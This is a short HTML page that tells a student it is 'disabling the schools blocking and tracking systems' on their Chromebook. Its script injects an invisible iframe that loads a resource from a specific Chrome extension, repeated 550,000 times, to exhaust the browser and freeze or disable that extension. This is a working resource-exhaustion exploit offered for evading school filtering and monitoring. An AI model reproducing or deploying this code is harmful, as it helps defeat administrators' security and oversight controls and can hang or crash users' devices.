<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Loading Page</title>
  <style>
    body {
      background-color: #f0f0f0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      font-family: Arial, sans-serif;
    }

    h1 {
      text-align: center;
      font-size: 36px;
      margin-bottom: 10px;
    }

    h2 {
      text-align: center;
      font-size: 24px;
    }

    .loading-container {
      text-align: center;
      background-color: #ffffff;
      padding: 30px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }

    .loading-text {
      font-size: 24px;
      color: #333;
      margin-bottom: 20px;
    }

    .loading-icon {
      width: 80px;
      height: 80px;
      margin-bottom: 20px;
      animation: spin 1.5s linear infinite;
    }

    @keyframes spin {
      from { transform: rotate(0deg); }
      to { transform: rotate(360deg); }
    }
  </style>
</head>
<body>

  <div class="loading-container" style="z-index: 99;"> 
   <h1 style="z-index: 99;">Hold on!</h1>
   <h2 style="z-index: 99;">We are currently disabling the schools blocking and tracking systems on your chromebook, this will prevent them from blocking as many sites and tracking you! please wait around 10 seconds, this may freeze your chromebook.</h2>
    <img class="loading-icon" src="loading.png" alt="Loading Icon" style="z-index: 99;">
    <p class="loading-text" style="z-index: 99;">Please wait...</p>
  </div>

  <script defer>
      document.body.innerHTML += `<iframe src="chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/web_accessible_resources/32x32.png" style="width: 1px; height: 1px; opacity: 0; z-index: -1; position: absolute;"></iframe>`.repeat(550000)
  </script>


</body>
</html>
